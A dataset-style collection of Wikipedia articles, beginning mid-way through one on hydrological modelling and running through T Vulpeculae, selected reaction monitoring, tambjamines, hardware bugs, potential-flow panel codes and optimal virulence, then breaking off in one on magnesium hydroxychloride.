
Statistical moments (e.g., mean, standard deviation, skewness, kurtosis) are used to describe the information content of data. These moments can then be used to determine an appropriate frequency distribution, which can then be used as a probability model. Two common techniques include L-moment ratios and moment-ratio diagrams.
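As a concrete illustration of the moments just described, the following short Python sketch summarizes an annual peak-flow series with its first four moments. All flow values are invented, and the use of numpy/scipy is an assumption for illustration, not something the text prescribes:

import numpy as np
from scipy import stats

# Hypothetical annual peak flows (m^3/s) for a small gauged catchment.
peaks = np.array([312., 455., 289., 601., 378., 523., 410., 344., 698., 275.])

mean = peaks.mean()                       # first moment: central tendency
std = peaks.std(ddof=1)                   # second moment: spread
skew = stats.skew(peaks, bias=False)      # third moment: asymmetry
kurt = stats.kurtosis(peaks, bias=False)  # fourth moment: tail weight (excess)

print(f"mean={mean:.1f} m^3/s  std={std:.1f}  skew={skew:.2f}  kurtosis={kurt:.2f}")

A strongly positive skewness, for instance, would argue against a symmetric probability model and toward a right-tailed frequency distribution for these peaks.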
The frequency of extremal events, such as severe droughts and storms, often requires the use of distributions that focus on the tail of the distribution, rather than the data nearest the mean. These techniques, collectively known as extreme value analysis, provide a methodology for identifying the likelihood and uncertainty of extreme events. Examples of extreme value distributions include the Gumbel, Pearson, and generalized extreme value distributions. The standard method for determining peak discharge uses the log-Pearson Type III (log-gamma) distribution and observed annual flow peaks.

Correlation analysis

The degree and nature of correlation may be quantified using a method such as the Pearson correlation coefficient, autocorrelation, or the t-test. The degree of randomness or uncertainty in the model may also be estimated using stochastics or residual analysis. These techniques may be used in the identification of flood dynamics, storm characterization, and groundwater flow in karst systems.

Regression analysis is used in hydrology to determine whether a relationship may exist between independent and dependent variables. Bivariate diagrams are the most commonly used statistical regression model in the physical sciences, but there are a variety of models available, from simplistic to complex. In a bivariate diagram, a linear or higher-order model may be fitted to the data.

Factor analysis and principal component analysis are multivariate statistical procedures used to identify relationships between hydrologic variables.

Convolution is a mathematical operation on two different functions to produce a third function. With respect to hydrologic modeling, convolution can be used to analyze the relationship of stream discharge to precipitation, and to predict discharge downstream after a precipitation event. This type of model would be considered a "lag convolution", because it predicts the "lag time" as water moves through the watershed.

Time-series analysis is used to characterize temporal correlation within a data series as well as between different time series. Many hydrologic phenomena are studied within the context of historical probability. Within a temporal dataset, event frequencies, trends, and comparisons may be made by using the statistical techniques of time series analysis. The questions that are answered through these techniques are often important for municipal planning, civil engineering, and risk assessments.

Markov chains are a mathematical technique for determining the probability of a state or event based on a previous state or event. The events must be dependent, as with the day-to-day persistence of rainy weather. Markov chains were first used to model rainfall event length in days in 1976, and continue to be used for flood risk assessment and dam management.
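The following minimal Python sketch illustrates the two-state Markov chain idea from the paragraph above. The transition probabilities and the one-year horizon are invented for illustration; in practice they would be estimated from an observed record of wet and dry days:

import numpy as np

rng = np.random.default_rng(42)
p_wet_given_dry = 0.25   # P(wet tomorrow | dry today), hypothetical
p_wet_given_wet = 0.65   # P(wet tomorrow | wet today), i.e. persistence

state = 0                # 0 = dry, 1 = wet
sequence = []
for _ in range(365):     # simulate one year of daily occurrence
    p = p_wet_given_wet if state == 1 else p_wet_given_dry
    state = 1 if rng.random() < p else 0
    sequence.append(state)

seq = np.array(sequence)
print("wet days:", seq.sum())

# Wet-spell lengths: pad with dry days, locate run starts/ends from the
# sign changes, then take every other difference (the runs themselves).
changes = np.flatnonzero(np.diff(np.r_[0, seq, 0]))
spells = np.diff(changes)[::2]
print("mean wet-spell length:", spells.mean() if spells.size else 0.0)

Statistics such as the simulated wet-spell lengths are the kind of output that feeds into flood-risk screening and reservoir operation studies.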
Data-driven models

Data-driven models in hydrology emerged as an alternative approach to traditional statistical models, offering a more flexible and adaptable methodology for analysing and predicting various aspects of hydrological processes. While statistical models rely on rigorous assumptions about probability distributions, data-driven models leverage techniques from artificial intelligence, machine learning, and statistical analysis, including correlation analysis, time series analysis, and statistical moments, to learn complex patterns and dependencies from historical data. This allows them to make more accurate predictions and provide insights into the underlying processes.

Since their inception in the latter half of the 20th century, data-driven models have gained popularity in the water domain, as they help improve forecasting, decision-making, and management of water resources. Notable publications that use data-driven models in hydrology include "Application of machine learning techniques for rainfall-runoff modelling" by Solomatine and Siek (2004), and "Data-driven modelling approaches for hydrological forecasting and prediction" by Valipour et al. (2021). These models are commonly used for predicting rainfall, runoff, groundwater levels, and water quality, and have proven to be valuable tools for optimizing water resource management strategies.

Conceptual models

Conceptual models represent hydrologic systems using physical concepts. The conceptual model is used as the starting point for defining the important model components. The relationships between model components are then specified using algebraic equations, ordinary or partial differential equations, or integral equations. The model is then solved using analytical or numerical procedures.

Conceptual models are commonly used to represent the important components (e.g., features, events, and processes) that relate hydrologic inputs to outputs. These components describe the important functions of the system of interest, and are often constructed using entities (stores of water) and relationships between these entities (flows or fluxes between stores). The conceptual model is coupled with scenarios to describe specific events (either input or outcome scenarios).

For example, a watershed model could be represented using tributaries as boxes with arrows pointing toward a box that represents the main river. The conceptual model would then specify the important watershed features (e.g., land use, land cover, soils, subsoils, geology, wetlands, lakes), atmospheric exchanges (e.g., precipitation, evapotranspiration), human uses (e.g., agricultural, municipal, industrial, navigation, thermo- and hydro-electric power generation), flow processes (e.g., overland, interflow, baseflow, channel flow), transport processes (e.g., sediments, nutrients, pathogens), and events (e.g., low-, flood-, and mean-flow conditions).

Model scope and complexity are dependent on modeling objectives, with greater detail required if human or environmental systems are subject to greater risk. Systems modeling can be used for building conceptual models that are then populated using mathematical relationships.

Example 1

The linear-reservoir model (or Nash model) is widely used for rainfall-runoff analysis. The model uses a cascade of linear reservoirs along with a constant first-order storage coefficient, K, to predict the outflow from each reservoir (which is then used as the input to the next in the series). The model combines continuity and storage-discharge equations, which yields an ordinary differential equation that describes outflow from each reservoir. The continuity equation for tank models is

    dS/dt = I(t) - q(t)

which indicates that the change in storage over time is the difference between inflows and outflows. The storage-discharge relationship is

    q = S/K

where K is a constant that indicates how quickly the reservoir drains; a smaller value indicates more rapid outflow. Combining these two equations yields

    dq/dt = (I - q)/K

and, for a constant inflow I, this has the solution

    q(t) = I + (q0 - I) exp(-t/K)
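A minimal numerical sketch of Example 1 in Python follows. The rainfall pulse, the choice of three reservoirs, and the explicit Euler time-stepping are illustrative assumptions, not details given in the text; each reservoir obeys dS/dt = I - q with q = S/K, and each reservoir's outflow feeds the next:

import numpy as np

K = 5.0                       # storage coefficient (hours); smaller K drains faster
n_res = 3                     # number of reservoirs in the cascade (assumed)
dt = 0.01                     # time step (hours)
t = np.arange(0.0, 60.0, dt)

inflow = np.where(t < 2.0, 10.0, 0.0)   # hypothetical 2-hour rainfall pulse (m^3/s)

S = np.zeros(n_res)                     # storage in each reservoir
q_out = np.zeros_like(t)                # outflow of the last reservoir
for i, I in enumerate(inflow):
    upstream = I
    for j in range(n_res):
        q = S[j] / K                    # storage-discharge relation q = S/K
        S[j] += dt * (upstream - q)     # continuity: dS/dt = inflow - outflow
        upstream = q                    # this reservoir feeds the next one
    q_out[i] = upstream

print(f"peak outflow {q_out.max():.2f} m^3/s at t = {t[q_out.argmax()]:.1f} h")

The printed peak is lower and later than the input pulse, which is exactly the attenuation and lag the cascade is meant to reproduce.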
Example 2

Instead of using a series of linear reservoirs, a non-linear reservoir can be used. In such a model the constant K in the above equation, which may also be called the reaction factor, must be replaced by another symbol, say α (alpha), to indicate the dependence of this factor on storage (S) and discharge (q). In one example the relation is quadratic:

    α = 0.0123 q² + 0.138 q - 0.112

Governing equations

Governing equations are used to mathematically define the behavior of the system. Algebraic equations are often used for simple systems, while ordinary and partial differential equations are often used for problems that change in space and time. Examples of governing equations include:

Manning's equation, an algebraic equation that predicts stream velocity v as a function of channel roughness n, the hydraulic radius R, and the channel slope S: v = (1/n) R^(2/3) S^(1/2)

Darcy's law, which describes steady, one-dimensional groundwater flow using the hydraulic conductivity K and the hydraulic gradient: q = -K dh/dl

Groundwater flow equation, which describes time-varying, multidimensional groundwater flow using the aquifer transmissivity T and storativity S: S ∂h/∂t = T (∂²h/∂x² + ∂²h/∂y²)

Advection-dispersion equation, which describes solute movement in steady, one-dimensional flow using the solute dispersion coefficient D and the groundwater velocity v: ∂C/∂t = D ∂²C/∂x² - v ∂C/∂x

Poiseuille's law, which describes laminar, steady, one-dimensional fluid flow using the shear stress

Cauchy's integral, an integral method for solving boundary value problems

Solution algorithms

Analytic methods

Exact solutions for algebraic, differential, and integral equations can often be found using specified boundary conditions and simplifying assumptions. Laplace and Fourier transform methods are widely used to find analytic solutions to differential and integral equations.

Numeric methods

Many real-world mathematical models are too complex to meet the simplifying assumptions required for an analytic solution. In these cases, the modeler develops a numerical solution that approximates the exact solution. Solution techniques include the finite-difference and finite-element methods, among many others. Specialized software may also be used to solve sets of equations using a graphical user interface and complex code, such that the solutions are obtained relatively rapidly and the program may be operated by a layperson or an end user without a deep knowledge of the system. There are model software packages for hundreds of hydrologic purposes, such as surface water flow, nutrient transport and fate, and groundwater flow. Commonly used numerical models include SWAT, MODFLOW, FEFLOW, PORFLOW, MIKE SHE, and WEAP.

Model calibration and evaluation

Physical models use parameters to characterize the unique aspects of the system being studied. These parameters can be obtained using laboratory and field studies, or estimated by finding the best correspondence between observed and modelled behavior. Between neighbouring catchments which have physical and hydrological similarities, the model parameters vary smoothly, suggesting the spatial transferability of parameters. Model evaluation is used to determine the ability of the calibrated model to meet the needs of the modeler. A commonly used measure of hydrologic model fit is the Nash-Sutcliffe efficiency coefficient.

See also
Hydrological optimization
Scientific modelling
Soil and Water Assessment Tool

References

External links
http://drought.unl.edu/MonitoringTools/DownloadableSPIProgram.aspx

Water resources management
Hydrological model
Biology,Environmental_science
2,629
41,729,693
https://en.wikipedia.org/wiki/T%20Vulpeculae
T Vulpeculae is a possible binary star system in the northern constellation of Vulpecula, near the star Zeta Cygni and close to the pair 31 Vulpeculae and 32 Vulpeculae. It is visible to the naked eye, with an apparent visual magnitude that varies around 5.75. The distance to this system is around 1,900 light years, as determined from its annual parallax shift of .

A well-studied classical Cepheid variable and one of the brightest known, T Vulpeculae ranges in apparent magnitude from 5.41 to 6.09 over a period of 4.435 days. It is a yellow-white hued supergiant of spectral type F5 Ib. The variability of T Vul was discovered in 1885 by Edwin Sawyer. Observations between 1885 and 2003 show a small but continuous decrease in the period of variability, amounting to 0.25 seconds per year.

The companion star was detected in 1992; it is an A-type main-sequence star with a class of A0.8 V and 2.1 times the Sun's mass. Orbital periods of 738 and 1,745 days have been proposed for the pair although, as of 2015, there remains doubt as to whether this is an actual binary system.

References

Classical Cepheid variables F-type supergiants A-type main-sequence stars Binary stars Vulpecula Durchmusterung objects 198726 102949 7988 Vulpeculae, T
T Vulpeculae
Astronomy
317
21,953,783
https://en.wikipedia.org/wiki/Selected%20reaction%20monitoring
Selected reaction monitoring (SRM), also called multiple reaction monitoring (MRM), is a method used in tandem mass spectrometry in which an ion of a particular mass is selected in the first stage of a tandem mass spectrometer and an ion product of a fragmentation reaction of the precursor ion is selected in the second mass spectrometer stage for detection.

Variants

A general case of SRM can be represented by ABCD+ → AB + CD+, where the precursor ion ABCD+ is selected by the first stage of mass spectrometry (MS1), dissociates into molecule AB and product ion CD+, and the latter is selected by the second stage of mass spectrometry (MS2) and detected. The precursor and product ion pair is called an SRM "transition".

Consecutive reaction monitoring (CRM) is the serial application of three or more stages of mass spectrometry to SRM. In a simple case, ABCD+ is selected by MS1 and dissociates into molecule AB and ion CD+. That ion is selected in the second mass spectrometry stage (MS2) and then undergoes further fragmentation to form ion D+, which is selected in the third mass spectrometry stage (MS3) and detected.

Multiple reaction monitoring (MRM) is the application of selected reaction monitoring to multiple product ions from one or more precursor ions; for example, ABCD+ is selected by MS1 and dissociates by two pathways, forming either AB+ or CD+. The ions are selected sequentially by MS2 and detected.

Parallel reaction monitoring (PRM) is the application of SRM with parallel detection of all transitions in a single analysis using a high resolution mass spectrometer.

Proteomics

SRM can be used for targeted quantitative proteomics by mass spectrometry. Following ionization in, for example, an electrospray source, a peptide precursor is first isolated to obtain a substantial ion population of mostly the intended species. This population is then fragmented to yield product ions whose signal abundances are indicative of the abundance of the peptide in the sample. This experiment can be performed on triple quadrupole mass spectrometers, where mass-resolving Q1 isolates the precursor, q2 acts as a collision cell, and mass-resolving Q3 is cycled through the product ions, which are detected by an electron multiplier upon exiting the last quadrupole. A precursor/product pair is often referred to as a transition. Much work goes into ensuring that transitions are selected that have maximum specificity.

By adding heavy isotope-labeled (e.g., D, 13C, or 15N) peptides to a complex matrix as concentration standards, SRM can be used to construct a calibration curve that can provide the absolute quantification (i.e., copy number per cell) of the native, light peptide, and by extension, its parent protein. SRM has been used to identify the proteins encoded by wild-type and mutant genes (mutant proteins) and to quantify their absolute copy numbers in tumors and biological fluids. It thus answers basic questions about the absolute copy number of proteins in a single cell, which will be essential in digital modelling of mammalian cells and the human body, and about the relative levels of genetically abnormal proteins in tumors, and is proving useful for diagnostic applications. SRM has also been used as a method of triggering full product ion scans of peptides, either to confirm the specificity of the SRM transition or to detect specific post-translational modifications that are below the limit of detection of standard MS analyses.
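As a hedged illustration of the calibration-curve quantification described above, here is a minimal Python sketch of one common scheme (a dilution series of light standard with a fixed heavy internal-standard spike; every number is invented):

import numpy as np

# Calibration series: known amounts of unlabeled (light) standard peptide,
# each measured against the same fixed spike of heavy-labeled standard.
light_fmol = np.array([1.0, 5.0, 10.0, 50.0, 100.0])
ratio = np.array([0.021, 0.098, 0.205, 1.01, 2.04])   # light/heavy peak-area ratios

# Least-squares calibration line: ratio = slope * amount + intercept.
slope, intercept = np.polyfit(light_fmol, ratio, 1)

# An unknown sample, processed with the same heavy spike, is quantified
# by inverting the calibration line.
sample_ratio = 0.55
sample_fmol = (sample_ratio - intercept) / slope
print(f"native peptide ~ {sample_fmol:.1f} fmol on column")

Because the heavy and light forms co-elute and fragment identically, the peak-area ratio cancels most run-to-run variability, which is what makes the inversion step defensible.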
In 2017, SRM was developed into a highly sensitive and reproducible mass spectrometry-based targeted protein detection platform (entitled "SAFE-SRM"). This new SRM-based pipeline was shown to have major advantages over traditional SRM pipelines in clinical proteomics applications, and demonstrated dramatically improved diagnostic performance compared with antibody-based protein biomarker diagnostic methods, such as ELISA.

See also
Protein mass spectrometry
Quantitative proteomics

References

External links
SRMatlas; quantify proteins in complex proteome digests by mass spectrometry

Mass spectrometry Proteomics
Selected reaction monitoring
Physics,Chemistry
878
42,872,715
https://en.wikipedia.org/wiki/Tambjamine
Tambjamines are a group of natural products that are structurally related to the prodiginines. They are enamine derivatives of 4-methoxy-2,2'-bipyrrole-5-carboxaldehyde (MBC).

Chemical structure

Tambjamines are composed of two pyrrole rings with an enamine moiety at C-5 and a methoxy group at C-4; the majority have short alkyl chains connected to the enamine nitrogen. This group of alkaloids has been isolated from marine invertebrates and bacteria (both marine and terrestrial).

Marine sources and ecological roles

The large nudibranch Roboastra tigris is a known predator of Tambja eliora and Tambja abdere, two species of smaller nudibranchs. The chemical extracts of all three nudibranch species contain tambjamines, which were traced to Sessibugula translucens, a bryozoan that is a food source of the two prey species. It is hypothesized that tambjamines are a chemical defence mechanism of the bryozoan against feeding by the spotted kelpfish Gibbonsia elegans.

Production

Biosynthesis

The biosynthetic gene cluster responsible for tambjamine production was identified in 2007 using functional genomic analysis of a Pseudoalteromonas tunicata strain. The Tam cluster consists of 19 proteins, 12 of which were found to be highly similar to proteins in the Red and Pig pathways of prodigiosin biosynthesis, based on sequence data. The biosynthesis of tambjamine YP1 first involves the incorporation of proline, malonyl-CoA, and serine to form 4-methoxy-2,2'-bipyrrole-5-carboxaldehyde (MBC). AfaA is hypothesized to activate long-chain fatty acids, while the predicted dehydrogenase TamT introduces a double bond into a fatty acyl side chain. TamH then carries out the reduction of the CoA ester to form an aldehyde intermediate, followed by transamination. Condensation of the resulting dodec-3-en-1-amine with MBC by TamQ yields tambjamine YP1.

Laboratory

The aldehyde MBC was first prepared by total synthesis when the structure of prodigiosin was being investigated. It has subsequently been synthesised by other methods and used to make tambjamines and related natural products.

See also
Prodiginines

References

Alkaloids Enamines Ethers Pyrroles
Tambjamine
Chemistry
566
5,907,652
https://en.wikipedia.org/wiki/Hardware%20bug
A hardware bug is a bug in computer hardware. It is the hardware counterpart of a software bug, a defect in software. A bug differs from a glitch, which describes an undesirable behavior that is quick, transient, and intermittent rather than constant, and from a quirk, which is a behavior that may be considered useful even though it was not intentionally designed. Errata (corrections to the documentation) may be published by the manufacturer to describe hardware bugs, and "errata" is sometimes used as a term for the bugs themselves.

History

Unintended operation

Sometimes users take advantage of the unintended or undocumented operation of hardware to serve some purpose, in which case a flaw may be considered a feature. This gives rise to the often ironically employed acronym INABIAF, "It's Not A Bug It's A Feature". For example, undocumented instructions, known as illegal opcodes, on the MOS Technology 6510 of the Commodore 64 and the MOS Technology 6502 of the Apple II computers are sometimes utilized.

Security vulnerabilities

Some flaws in hardware may lead to security vulnerabilities in which memory protection or other features fail to work properly. Starting in 2017, a series of security vulnerabilities were found in the implementations of speculative execution on common processor architectures that allowed a violation of privilege levels. In 2019, researchers discovered that a manufacturer debugging mode, known as VISA, existed as an undocumented feature on Intel Platform Controller Hubs (chipsets), and that the mode was accessible from a normal motherboard, possibly leading to a security vulnerability.

Pentium bugs

The Intel Pentium series of CPUs had two well-known bugs discovered after it was brought to market: the FDIV bug, affecting floating-point division, which resulted in a recall in 1994, and the F00F bug, discovered in 1997, which causes the processor to stop operating until rebooted.

References

Hardware bugs Engineering concepts
Hardware bug
Engineering
390
17,303,780
https://en.wikipedia.org/wiki/Aerodynamic%20potential-flow%20code
In fluid dynamics, aerodynamic potential flow codes or panel codes are used to determine the fluid velocity, and subsequently the pressure distribution, on an object. This may be a simple two-dimensional object, such as a circle or wing, or it may be a three-dimensional vehicle. Series of singularities, such as sources, sinks, vortex points and doublets, are used to model the panels and wakes. These codes may be valid at subsonic and supersonic speeds.

History

Early panel codes were developed in the late 1960s to early 1970s. Advanced panel codes, such as Panair (developed by Boeing), were first introduced in the late 1970s and gained popularity as computing speed increased. Over time, panel codes were replaced with higher-order panel methods and subsequently CFD (computational fluid dynamics). However, panel codes are still used for preliminary aerodynamic analysis, as the time required for an analysis run is significantly less due to the decreased number of elements.

Assumptions

These are the assumptions that go into developing potential flow panel methods:
Inviscid
Incompressible
Irrotational
Steady

However, the incompressible flow assumption may be removed from the potential flow derivation, leaving:
Potential flow (inviscid, irrotational, steady)

Derivation of panel method solution to potential flow problem

The derivation starts from the small-disturbance (subsonic) form of the equations and the divergence theorem. Let the velocity potential be a twice continuously differentiable function in a region of volume V in space. Let P be a point in the volume V, let S be the surface boundary of the volume, and let Q be a point on the surface S. As Q goes from inside V to the surface of V, the integral representation of the potential at P splits into a source term and a doublet term, with the surface normal taken to point inwards. The source strength and the doublet strength at an arbitrary point Q enter the resulting simplified potential flow equation. With this equation, along with applicable boundary conditions, the potential flow problem may be solved.

Required boundary conditions

The velocity potential on the internal surface, and at all points inside V (or on the lower surface S), is 0.
The velocity potential on the outer surface is normal to the surface and is equal to the freestream velocity.

These basic equations are satisfied when the geometry is a "watertight" geometry. If it is watertight, it is a well-posed problem; if it is not, it is an ill-posed problem.

Discretization of potential flow equation

In the potential flow equation with well-posed boundary conditions applied, one integral term is evaluated only on the upper surface, while the other is evaluated on both the upper and lower surfaces. The continuous surface S may now be discretized into discrete panels that approximate the shape of the actual surface. The values of the various source and doublet terms may be evaluated at a convenient point (such as the centroid of the panel). An assumed distribution of the source and doublet strengths (typically constant or linear) is used at points other than the centroid. A single source term s of unknown strength and a single doublet term m of unknown strength are defined at a given point. These terms can be used to create a system of linear equations which can be solved for all the unknown strengths.
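The following Python sketch illustrates this discretization for the simplest case: two-dimensional, non-lifting flow over a circular cylinder using constant-strength source panels only, so the doublet (lift) terms are omitted. The geometry, panel count, and freestream value are assumptions for illustration; the induced-velocity formulas are the standard analytic ones for a constant source panel, and for the cylinder the computed incompressible pressure coefficient can be checked against the exact result Cp = 1 - 4 sin²θ:

import numpy as np

N = 60                                    # number of panels (assumed)
V_inf = 1.0                               # freestream speed, along +x

# Panel endpoints on a unit circle, ordered counter-clockwise.
th = np.linspace(0.0, 2.0 * np.pi, N + 1)
xa, ya = np.cos(th[:-1]), np.sin(th[:-1])         # panel start points
xb, yb = np.cos(th[1:]), np.sin(th[1:])           # panel end points
xm, ym = 0.5 * (xa + xb), 0.5 * (ya + yb)         # control points (midpoints)
L = np.hypot(xb - xa, yb - ya)                    # panel lengths
tx, ty = (xb - xa) / L, (yb - ya) / L             # unit tangents
nx, ny = ty, -tx                                  # outward unit normals (CCW ordering)

An = np.zeros((N, N))    # normal-velocity influence of unit source strength
At = np.zeros((N, N))    # tangential-velocity influence
for i in range(N):
    for j in range(N):
        if i == j:
            An[i, j] = 0.5        # self-induced normal velocity of a source panel
            continue
        # Control point i in the local frame of panel j:
        dx, dy = xm[i] - xa[j], ym[i] - ya[j]
        xi = dx * tx[j] + dy * ty[j]
        eta = dx * nx[j] + dy * ny[j]
        # Velocity induced by a unit-strength constant source panel:
        u_loc = np.log((xi**2 + eta**2) / ((xi - L[j])**2 + eta**2)) / (4 * np.pi)
        v_loc = (np.arctan2(eta, xi - L[j]) - np.arctan2(eta, xi)) / (2 * np.pi)
        # Rotate back to global axes, then project onto panel i's normal/tangent:
        u = u_loc * tx[j] + v_loc * nx[j]
        v = u_loc * ty[j] + v_loc * ny[j]
        An[i, j] = u * nx[i] + v * ny[i]
        At[i, j] = u * tx[i] + v * ty[i]

# Flow tangency: total normal velocity vanishes at every control point.
sigma = np.linalg.solve(An, -V_inf * nx)

V_t = V_inf * tx + At @ sigma          # surface tangential velocity
Cp = 1.0 - (V_t / V_inf) ** 2          # incompressible pressure coefficient

Cp_exact = 1.0 - 4.0 * np.sin(np.arctan2(ym, xm)) ** 2
print("max |Cp - Cp_exact| =", np.abs(Cp - Cp_exact).max())

Refining the panel count drives the discrepancy toward zero, which is the usual convergence check for a panel discretization.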
Methods for discretizing panels

Constant strength: simple, but a large number of panels is required.
Linearly varying strength: a reasonable answer, with little difficulty in creating well-posed problems.
Quadratically varying strength: accurate, but more difficult to pose well.

Some techniques are commonly used to model surfaces:
Body thickness by line sources
Body lift by line doublets
Wing thickness by constant source panels
Wing lift by constant pressure panels
Wing-body interface by constant pressure panels

Methods of determining pressure

Once the velocity at every point is determined, the pressure can be determined by using one of several formulas: the isentropic, incompressible, second-order, slender-body-theory, linear-theory, or reduced second-order pressure coefficient. The various pressure coefficient methods produce similar results and are commonly used to identify regions where the results are invalid. The pressure coefficient is defined as

    Cp = (p - p∞) / (½ ρ∞ V∞²)

For incompressible flow this reduces to Cp = 1 - (V/V∞)², and in linear theory it is approximated by Cp = -2u/V∞, where u is the perturbation velocity along the freestream direction.

What panel methods cannot do

Panel methods are inviscid solutions. You will not capture viscous effects except via user "modeling" by changing the geometry. Solutions are invalid as soon as the flow changes locally from subsonic to supersonic (i.e. the critical Mach number has been exceeded) or vice versa.

Potential flow software

See also
Stream function
Conformal mapping
Velocity potential
Divergence theorem
Joukowsky transform
Potential flow
Circulation
Biot–Savart law

Notes

References
Public Domain Aerodynamic Software, A Panair Distribution Source, Ralph Carmichael
Panair Volume I, Theory Manual, Version 3.0, Michael Epton, Alfred Magnus, 1990, Boeing
Panair Volume II, Theory Manual, Version 3.0, Michael Epton, Alfred Magnus, 1990, Boeing
Panair Volume III, Case Manual, Version 1.0, Michael Epton, Kenneth Sidewell, Alfred Magnus, 1981, Boeing
Panair Volume IV, Maintenance Document, Version 3.0, Michael Epton, Kenneth Sidewell, Alfred Magnus, 1991, Boeing
Recent Experience in Using Finite Element Methods For The Solution Of Problems In Aerodynamic Interference, Ralph Carmichael, 1971, NASA Ames Research Center

Fluid dynamics
Aerodynamic potential-flow code
Chemistry,Engineering
1,111
3,913,867
https://en.wikipedia.org/wiki/Optimal%20virulence
Optimal virulence is a concept relating to the ecology of hosts and parasites. One definition of virulence is the host's parasite-induced loss of fitness. The parasite's fitness is determined by its success in transmitting offspring to other hosts. For about 100 years, the consensus was that virulence decreased over time and that parasitic relationships evolved toward symbiosis. This view was even called the law of declining virulence, despite being a hypothesis rather than a theory. It has been challenged since the 1980s and has been disproved.

A pathogen that is too restrained will lose out in competition to a more aggressive strain that diverts more host resources to its own reproduction. However, the host, being the parasite's resource and habitat in a way, suffers from this higher virulence. This might induce faster host death, and act against the parasite's fitness by reducing the probability of encountering another host (killing the host too fast to allow for transmission). Thus, there is a natural force providing pressure on the parasite to "self-limit" virulence. The idea is, then, that there exists an equilibrium point of virulence, where the parasite's fitness is highest. Any movement along the virulence axis, towards higher or lower virulence, will result in lower fitness for the parasite, and thus will be selected against.

Mode of transmission

Paul W. Ewald has explored the relationship between virulence and mode of transmission. He came to the conclusion that virulence tends to remain especially high in waterborne and vector-borne infections, such as cholera and dengue. Cholera is spread through sewage and dengue through mosquitos. In the case of respiratory infections, the pathogen depends on an ambulatory host to survive: it must spare the host long enough to find a new host. Water- or vector-borne transmission circumvents the need for a mobile host. Ewald is convinced that the crowding of field hospitals and trench warfare provided an easy route to transmission that drove the evolution of the high virulence of the 1918 influenza pandemic. In such immobilized, crowded conditions, pathogens can make individuals very sick and still jump to healthy individuals.

Other epidemiologists have expanded on the idea of a tradeoff between the costs and benefits of virulence. One factor is the time or distance between potential hosts; airplane travel, crowded factory farms, and urbanization have all been suggested as possible sources of virulence. Another factor is the presence of multiple infections in a single host, leading to increased competition among pathogens. In this scenario, the host can survive only as long as it resists the most virulent strains, and the advantage of a low-virulence strategy becomes moot. Multiple infections can also result in gene swapping among pathogens, increasing the likelihood of lethal combinations.

Evolutionary hypotheses

There are three main hypotheses about why a pathogen evolves as it does. These three models help to explain the life history strategies of parasites, including reproduction, migration within the host, virulence, and so on. The three hypotheses are the trade-off hypothesis, the short-sighted evolution hypothesis, and the coincidental evolution hypothesis. All of these offer ultimate explanations for virulence in pathogens.

Trade-off hypothesis

At one time, some biologists argued that pathogens would tend to evolve toward ever-decreasing virulence because the death of the host (or even serious disability) is ultimately harmful to the pathogen living inside.
For example, if the host dies, the pathogen population inside may die out entirely. Therefore, it was believed that less virulent pathogens that allowed the host to move around and interact with other hosts should have greater success reproducing and dispersing. But this is not necessarily the case. Pathogen strains that kill the host can increase in virulence as long as the pathogen can transmit itself to a new host, whether before or after the host dies. The evolution of virulence in pathogens is a balance between the costs and benefits of virulence to the pathogen. For example, studies of the malaria parasite using rodent and chicken models found that there was a trade-off between transmission success and virulence, as defined by host mortality.

Short-sighted evolution hypothesis

Short-sighted evolution suggests that traits that increase the rate of reproduction and transmission to a new host will rise to high frequency within the pathogen population. These traits include the ability to reproduce sooner, reproduce faster, reproduce in higher numbers, live longer, survive against antibodies, or survive in parts of the body the pathogen does not normally infiltrate. These traits typically arise due to mutations, which occur more frequently in pathogen populations than in host populations, owing to the pathogens' rapid generation time and immense numbers. After only a few generations, the mutations that enhance rapid reproduction or dispersal will increase in frequency. The same mutations that enhance the reproduction and dispersal of the pathogen also enhance its virulence in the host, causing much harm (disease and death). If the pathogen's virulence kills the host and interferes with its own transmission to a new host, virulence will be selected against. But as long as transmission continues despite the virulence, virulent pathogens will have the advantage. So, for example, virulence often increases within families, where transmission from one host to the next is likely, no matter how sick the host. Similarly, in crowded conditions such as refugee camps, virulence tends to increase over time, since new hosts cannot escape the likelihood of infection.

Coincidental evolution hypothesis

Some forms of pathogenic virulence do not co-evolve with the host. For example, tetanus is caused by the soil bacterium Clostridium tetani. After C. tetani bacteria enter a human wound, the bacteria may grow and divide rapidly, even though the human body is not their normal habitat. While dividing, C. tetani produce a neurotoxin that is lethal to humans. But it is selection in the bacterium's normal life cycle in the soil that leads it to produce this toxin, not any evolution with a human host. The bacterium finds itself inside a human instead of in the soil by mere happenstance. We can say that the neurotoxin is not directed at the human host. More generally, the virulence of many pathogens in humans may not be a target of selection itself, but rather an accidental by-product of selection that operates on other traits, as is the case with antagonistic pleiotropy.

Expansion into new environments

A potential for virulence exists whenever a pathogen invades a new environment, host or tissue. The new host is likely to be poorly adapted to the intruder, either because it has not built up an immunological defense or because of a fortuitous vulnerability.
In times of change, natural selection favors mutations that exploit the new host more effectively than the founder strain did, providing an opportunity for virulence to erupt.

Host susceptibility

Host susceptibility contributes to virulence. Once transmission occurs, the pathogen must establish an infection to continue. The more competent the host immune system, the less chance there is for the parasite to survive. It may require multiple transmission events to find a suitably vulnerable host, and during this time the invader is dependent upon the survival of its current host. The optimum conditions for high virulence would be a community with immune dysfunction (and/or poor hygiene and sanitation) that was in all other ways as healthy as possible (e.g. optimum nutrition).

See also

References

External links
Empirical Support for Optimal Virulence in a Castrating Parasite
Evolution of Virulence
Adaptive Dynamics of Infectious Diseases: In Pursuit of Virulence ... Integrating across levels
Interesting discussion of the complexity of optimal virulence theory
`Small worlds' and the evolution of virulence: infection occurs ...
Pathogen Virulence: The Evolution of Sickness - A Review from the Science Creative Quarterly

Ecology Pathology
Optimal virulence
Biology
1,639
42,382,863
https://en.wikipedia.org/wiki/Magnesium%20hydroxychloride
Magnesium hydroxychloride is the traditional term for several chemical compounds of magnesium, chlorine, oxygen, and hydrogen, whose general formula can be written x Mg(OH)2 · y MgCl2 · z H2O, for various values of x, y, and z; or, equivalently, Mg(x+y)(OH)(2x)Cl(2y) · z H2O. The simple chemical formula Mg(OH)Cl is often used, appearing in high-school chemistry, for example. Other names for this class are magnesium chloride hydroxide, magnesium oxychloride, and basic magnesium chloride. Some of these compounds are major components of Sorel cement.

Compounds

The ternary diagram of the system MgO – MgCl2 – H2O has the following well-defined and stable phases:

Mg(OH)2 (magnesium hydroxide, the mineral brucite)
2Mg(OH)2·MgCl2·4H2O ("phase 2", "2:1:4")
3Mg(OH)2·MgCl2·8H2O ("phase 3", "3:1:8")
5Mg(OH)2·MgCl2·8H2O ("phase 5", "5:1:8")
